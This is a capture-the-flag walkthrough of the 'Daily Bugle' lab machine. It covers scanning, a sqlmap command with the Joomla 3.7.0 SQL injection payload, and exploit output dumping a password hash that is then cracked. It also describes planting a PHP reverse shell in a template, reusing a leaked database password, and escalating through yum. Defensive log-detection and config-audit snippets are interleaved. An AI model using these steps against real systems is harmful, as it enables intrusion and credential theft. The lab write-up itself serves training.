Daily Bugle WalkThrough

Daily Bugle is a CTF machine that is kinda hard and takes several methods to solve, so let’s start by accessing it from here

As always, let’s start with Nmap to enumerate Daily Bugle Machine and see which services are available on our target.

nmap -sV -sC Machine_IP

After the scan finishes, you should get something similar to the following

Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 08:55 EDT
Nmap scan report for
Host is up (0.27s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.63 seconds

From the results we learn the following:

  • An SSH service is running with asymmetric key authentication
  • An HTTP service is running, so we can access it from the browser
  • A robots.txt file was found, along with multiple directories
  • And finally, the CMS in use is Joomla

Let’s start by opening the server in the browser; the home page gives us the answer to the first question

Daily Bugle Website

Access the web server, who robbed the bank?


There’s nothing more on the home page, so let’s check the source code; there’s nothing important there either.

Let’s check the robots.txt file; there’s nothing there other than the admin login page.

Before we start brute forcing, the next question is about the Joomla version, which you can get by installing a tool called JoomScan that helps enumerate the Joomla CMS.

First you need to install it with

sudo apt-get install joomscan

and then we run the tool with the following command

joomscan -u http://Machine_IP

From the results of the scan, we get the next answer.

What is the Joomla version?


While the tool finishes scanning (it won’t show anything important that we don’t already know), let’s search exploit-db for any known vulnerability that we can exploit to get inside the CMS.

searchsploit joomla 3.7.0

And what do you know, we have two vulnerabilities, one of which is an SQL injection.

Let’s open the link above. We can see that the CMS can be exploited with a simple sqlmap command against the home page; you can use this command, but it will take a long time.

sqlmap -u "http://Machine_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
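
From the defender's side, the request shape in the sqlmap command above is easy to spot in web server logs. The following Python sketch is an added example (not from the original walkthrough or from any tool it uses); the log lines are constructed samples in Apache combined format, and the token list is an assumption about what never belongs in a sort-order value.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of an Apache combined-format log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed deny-list: SQL keywords and punctuation that a legitimate
# ordering value such as "a.title ASC" never contains.
SQL_TOKENS = re.compile(
    r"\b(updatexml|extractvalue|select|union|sleep|benchmark|concat)\b|[()';]|--|/\*",
    re.IGNORECASE,
)

# Constructed sample log lines (documentation IP range, no real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jun/2021:09:01:10 -0400] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [12/Jun/2021:09:01:11 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 310',
    '203.0.113.9 - - [12/Jun/2021:09:02:40 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title%20ASC HTTP/1.1" 200 4100',
    '203.0.113.5 - - [12/Jun/2021:09:03:02 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=UpdateXML HTTP/1.1" 500 310',
]


def suspicious_fullordering(log_line):
    """Return the decoded list[fullordering] value if it looks like SQL, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    # parse_qsl percent-decodes names and values, so list%5Bfullordering%5D matches too.
    params = dict(parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True))
    if params.get("option") != "com_fields":
        return None
    value = params.get("list[fullordering]")
    if value is not None and SQL_TOKENS.search(value):
        return value
    return None


def scan(lines):
    """Return (line_number, client_ip, value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_fullordering(line)
        if value is not None:
            hits.append((number, line.split()[0], value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
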

There’s a hint that we should use a Python script, so I searched online for a Joomla 3.7.0 SQL injection written in Python and I found the following script on GitHub.

So let’s get the script


Then let’s run it against our target; you should get something similar to this

 [-] Fetching CSRF token
 [-] Testing SQLi
('  -  Found table:', 'fb9j5_users')
('  -  Extracting users from', 'fb9j5_users')
(' [$] Found user', ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', ''])
('  -  Extracting sessions from', 'fb9j5_session')

So we have a user along with a password hash; let’s try to crack it (bcrypt hash) with John the Ripper.

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt password_joomla

and we get the next answer

What is Jonah’s cracked password?


Now let’s log in to the Joomla CMS.

After we log in, we need to upload a reverse shell so we can control the Daily Bugle machine and get the flag.

We know that Joomla runs on PHP, so we need a PHP reverse shell, but Joomla won’t let you upload it, so first we need to allow PHP file uploads.

You can allow that by going to Content->Media->Options, where you should see the “Legal Extension” field; you can also disable “restrict uploads” just in case

Daily Bugle Joomla

But it didn’t work. You can also try adding “php” to “Legal image extensions” and “Legal MIME Types”, but that didn’t work either.

Another way is to copy the code into the template, which runs PHP; if you go to Extensions->Templates->Templates you should get the following

Daily Bugle Joomla Template

If you enlarge the images, you can see that the second one is the one in use, so if we replace the index.php file (the one accessed by default for the home page) and then refresh the page, we should get the reverse shell.

After we get access, let’s head to the home folder

cd home

We can see that there’s a user called jjameson, but we don’t have permission to access it, so it’s time for privilege escalation.

If we check which “sudo” permissions we have by using

sudo -l

we can see that we have none, so as always, let’s check the second place, which is the crontab.

There’s nothing there, and we don’t have permission to edit the crontab either

-rw-r--r--. 1 root root 451 Jun  9  2014 /etc/crontab

Since there’s nothing, let’s check the web server files; maybe there is something in the configuration

cd /var/www/html

and let’s check what files we have


Let’s check the configuration file.

You should get something similar to this

	public $display_offline_message = '1';
	public $offline_image = '';
	public $sitename = 'The Daily Bugle';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'root';
	public $password = 'nv5uz9r3ZEDzVjNu';
	public $db = 'joomla';
	public $dbprefix = 'fb9j5_';
	public $live_site = '';
	public $secret = 'UAMBRWzHO3oFPmVC';
	public $gzip = '0';
	public $error_reporting = 'default';

So we have a password that might work. I tried the password on mysql and root users but it didn’t work, then I tried it on jjameson and voila!

su jjameson
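
The configuration above shows what an administrator can check for before an attacker does: the application connects to MySQL as root, and the secret sits in a readable file (its reuse for a login account is something no file check can reveal, so the database password must be unique to the database). The audit below is an added example, not part of the original walkthrough; the finding names and the sample file are constructed, with a placeholder password.

```python
import re
import stat

# Matches Joomla configuration.php lines such as:  public $user = 'root';
SETTING = re.compile(r"^\s*public\s+\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", re.MULTILINE)

# Constructed sample; the password is a placeholder, not the value from the page.
SAMPLE_CONFIG = """<?php
class JConfig {
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'EXAMPLE-PLACEHOLDER';
    public $db = 'joomla';
    public $debug = '0';
}
"""


def parse_config(text):
    """Return the public string settings of JConfig as a dict."""
    return dict(SETTING.findall(text))


def audit(text, file_mode):
    """Return finding ids for a configuration.php body and its st_mode."""
    cfg = parse_config(text)
    findings = []
    if cfg.get("user") == "root":
        # A web-app compromise then yields full control of every database.
        findings.append("db-user-is-root")
    if cfg.get("password") and file_mode & stat.S_IROTH:
        # Every local account, not just the web server's, can read the secret.
        findings.append("secret-world-readable")
    if cfg.get("debug") == "1":
        findings.append("debug-enabled")
    return findings


if __name__ == "__main__":
    # In real use: audit(open(path).read(), os.stat(path).st_mode)
    print(audit(SAMPLE_CONFIG, 0o100644))
```
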

And we can get our flag from here by going to the user’s home directory

What is the user flag?


Now it’s time to get root privileges; let’s see which sudo commands we can run by running sudo -l


So let’s see if we can escalate our privileges with this command by checking GTFOBins.

To escalate our privileges with yum, we have two methods: either create a package and install it, or method B, a custom plugin.

I’ll go with method B; once it works, you will be the root user, which you can check by running whoami

What is the root flag?


And finally, we have finished the Daily Bugle machine.